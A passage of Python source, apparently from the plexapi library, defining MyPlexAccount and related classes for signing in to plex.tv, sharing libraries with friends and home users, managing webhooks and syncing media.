session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
entitlements (List<str>): List of devices your allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (str): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
roles: (List<str>) Lit of account roles. Plexpass membership listed here.
scrobbleTypes (str): Description
secure (bool): Description
subscriptionActive (bool): True if your subsctiption is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=0&server=1&home=0' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token
self._session = session or requests.Session()
self._sonos_cache = []
self._sonos_cache_timestamp = 0
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = data.attrib.get('id')
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = []
for feature in subscription.iter('feature'):
self.subscriptionFeatures.append(feature.attrib.get('id'))
roles = data.find('roles')
self.roles = []
if roles:
for role in roles.iter('role'):
self.roles.append(role.attrib.get('id'))
entitlements = data.find('entitlements')
self.entitlements = []
for entitlement in entitlements.iter('entitlement'):
self.entitlements.append(entitlement.attrib.get('id'))
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for device in self.devices():
if device.name.lower() == name.lower():
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def sonos_speakers(self):
if 'companions_sonos' not in self.subscriptionFeatures:
return []
t = time.time()
if t - self._sonos_cache_timestamp > 60:
self._sonos_cache_timestamp = t
data = self.query('https://sonos.plex.tv/resources')
self._sonos_cache = [PlexSonosClient(self, elem) for elem in data]
return self._sonos_cache
def sonos_speaker(self, name):
return next((x for x in self.sonos_speakers() if x.title.split("+")[0].strip() == name), None)
def sonos_speaker_by_id(self, identifier):
return next((x for x in self.sonos_speakers() if x.machineIdentifier == identifier), None)
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
# If user does not already exists, treat request as new request and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections: ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
log.warning('Section name, number of section object is required changing library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
if isinstance(filterMovies, dict):
params['filterMovies'] = self._filterDictToStr(filterMovies or {}) # '1' if allowChannels else '0'
if isinstance(filterTelevision, dict):
params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
if isinstance(allowChannels, dict):
params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
allSectionIds[elem.attrib.get('id', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('title', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('key', '').lower()] = elem.attrib.get('id')
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section
sectionIds.append(allSectionIds[sectionKey.lower()])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
raise BadRequest('Unknown filter key: %s', key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`plexapi.video.Video.sync`, :func:`plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
If both `client` and `clientId` provided the client would be preferred.
If neither `client` nor `clientId` provided the clientId would be set to current clients`s identifier.
Returns:
:class:`plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
:class:`plexapi.exceptions.BadRequest`: when client with provided clientId wasn`t found.
:class:`plexapi.exceptions.BadRequest`: provided client doesn`t provides `sync-target`.
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
raise BadRequest('Unable to find client by clientId=%s', clientId)
if 'sync-target' not in client.provides:
raise BadRequest('Received client doesn`t provides sync-target')
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def podcasts(self):
""" Returns a list of Podcasts Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.PODCASTS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def tidal(self):
""" Returns a list of tidal Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.MUSIC + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
class MyPlexUser(PlexObject):
""" This object represents non-signed in users such as friends and linked
accounts. NOTE: This should not be confused with the :class:`~myplex.MyPlexAccount`
which is your specific account. The raw xml for the data presented here
can be found at: https://plex.tv/api/users/
Attributes:
TAG (str): 'User'
key (str): 'https://plex.tv/api/users/'
allowCameraUpload (bool): True if this user can upload images.
allowChannels (bool): True if this user has access to channels.
allowSync (bool): True if this user can sync.
email (str): User's email address ([email protected]).
filterAll (str): Unknown.
filterMovies (str): Unknown.
filterMusic (str): Unknown.
filterPhotos (str): Unknown.
filterTelevision (str): Unknown.
home (bool): Unknown.
id (int): User's Plex account ID.
protected (False): Unknown (possibly SSL enabled?).
recommendationsPlaylistId (str): Unknown.
restricted (str): Unknown.
thumb (str): Link to the users avatar.
title (str): Seems to be an aliad for username.
username (str): User's username.
servers: Servers shared between user and friend
"""
TAG = 'User'
key = 'https://plex.tv/api/users/'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.friend = self._initpath == self.key
self.allowCameraUpload = utils.cast(bool, data.attrib.get('allowCameraUpload'))
self.allowChannels = utils.cast(bool, data.attrib.get('allowChannels'))
self.allowSync = utils.cast(bool, data.attrib.get('allowSync'))
self.email = data.attrib.get('email')
self.filterAll = data.attrib.get('filterAll')
self.filterMovies = data.attrib.get('filterMovies')
self.filterMusic = data.attrib.get('filterMusic')
self.filterPhotos = data.attrib.get('filterPhotos')
self.filterTelevision = data.attrib.get('filterTelevision')
self.home = utils.cast(bool, data.attrib.get('home'))
self.id = utils.cast(int, data.attrib.get('id'))
self.protected = utils.cast(bool, data.attrib.get('protected'))
self.recommendationsPlaylistId = data.attrib.get('recommendationsPlaylistId')
self.restricted = data.attrib.get('restricted')
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title', '')
self.username = data.attrib.get('username', '')
self.servers = self.findItems(data, MyPlexServerShare)
for server in self.servers:
server.accountID = self.id
def get_token(self, machineIdentifier):
try:
for item in self._server.query(self._server.FRIENDINVITE.format(machineId=machineIdentifier)):
if utils.cast(int, item.attrib.get('userID')) == self.id:
return item.attrib.get('accessToken')
except Exception:
log.exception('Failed to get access token for %s' % self.title)
def server(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexServerShare` that matches the name specified.
Parameters:
name (str): Name of the server to return.
"""
for server in self.servers:
if name.lower() == server.name.lower():
return server
raise NotFound('Unable to find server %s' % name)
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in all shared servers.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
hist = []
for server in self.servers:
hist.extend(server.history(maxresults=maxresults, mindate=mindate))
return hist
class Section(PlexObject):
""" This refers to a shared section. The raw xml for the data presented here
can be found at: https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}
Attributes:
TAG (str): section
id (int): shared section id
sectionKey (str): what key we use for this section
title (str): Title of the section
sectionId (str): shared section id
type (str): movie, tvshow, artist
shared (bool): If this section is shared with the user
"""
TAG = 'Section'
def _loadData(self, data):
self._data = data
# self.id = utils.cast(int, data.attrib.get('id')) # Havnt decided if this should be changed.
self.sectionKey = data.attrib.get('key')
self.title = data.attrib.get('title')
self.sectionId = data.attrib.get('id')
self.type = data.attrib.get('type')
self.shared = utils.cast(bool, data.attrib.get('shared'))
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user for this section in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server._server.resource(self._server.name).connect()
return server.history(maxresults=maxresults, mindate=mindate,
accountID=self._server.accountID, librarySectionID=self.sectionKey)
class MyPlexServerShare(PlexObject):
""" Represents a single user's server reference. Used for library sharing.
Attributes:
id (int): id for this share
serverId (str): what id plex uses for this.
machineIdentifier (str): The servers machineIdentifier
name (str): The servers name
lastSeenAt (datetime): Last connected to the server?
numLibraries (int): Total number of libraries
allLibraries (bool): True if all libraries is shared with this user.
owned (bool): 1 if the server is owned by the user
pending (bool): True if the invite is pending.
"""
TAG = 'Server'
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self.id = utils.cast(int, data.attrib.get('id'))
self.accountID = utils.cast(int, data.attrib.get('accountID'))
self.serverId = utils.cast(int, data.attrib.get('serverId'))
self.machineIdentifier = data.attrib.get('machineIdentifier')
self.name = data.attrib.get('name')
self.lastSeenAt = utils.toDatetime(data.attrib.get('lastSeenAt'))
self.numLibraries = utils.cast(int, data.attrib.get('numLibraries'))
self.allLibraries = utils.cast(bool, data.attrib.get('allLibraries'))
self.owned = utils.cast(bool, data.attrib.get('owned'))
self.pending = utils.cast(bool, data.attrib.get('pending'))
def section(self, name):
""" Returns the :class:`~plexapi.myplex.Section` that matches the name specified.
Parameters:
name (str): Name of the section to return.
"""
for section in self.sections():
if name.lower() == section.title.lower():
return section
raise NotFound('Unable to find section %s' % name)
def sections(self):
""" Returns a list of all :class:`~plexapi.myplex.Section` objects shared with this user.
"""
url = MyPlexAccount.FRIENDSERVERS.format(machineId=self.machineIdentifier, serverId=self.id)
data = self._server.query(url)
sections = []
for section in data.iter('Section'):
if ElementTree.iselement(section):
sections.append(Section(self, section, url))
return sections
def history(self, maxresults=9999999, mindate=None):
""" Get all Play History for a user in this shared server.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
server = self._server.resource(self.name).connect()
return server.history(maxresults=maxresults, mindate=mindate, accountID=self.accountID)
class MyPlexResource(PlexObject):
""" This object represents resources connected to your Plex server that can provide
content such as Plex Media Servers, iPhone or Android clients, etc. The raw xml
for the data presented here can be found at:
https://plex.tv/api/resources?includeHttps=1&includeRelay=1
Attributes:
TAG (str): 'Device'
key (str): 'https://plex.tv/api/resources?includeHttps=1&includeRelay=1'
accessToken (str): This resources accesstoken.
clientIdentifier (str): Unique ID for this resource.
connections (list): List of :class:`~myplex.ResourceConnection` objects
for this resource.
createdAt (datetime): Timestamp this resource first connected to your server.
device (str): Best guess on the type of device this is (PS, iPhone, Linux, etc).
home (bool): Unknown
lastSeenAt (datetime): Timestamp this resource last connected.
name (str): Descriptive name of this resource.
owned (bool): True if this resource is one of your own (you logged into it).
platform (str): OS the resource is running (Linux, Windows, Chrome, etc.)
platformVersion (str): Version of the platform.
presence (bool): True if the resource is online
product (str): Plex product (Plex Media Server, Plex for iOS, Plex Web, etc.)
productVersion (str): Version of the product.
provides (str): List of services this resource provides (client, server,
player, pubsub-player, etc.)
synced (bool): Unknown (possibly True if the resource has synced content?)
"""
TAG = 'Device'
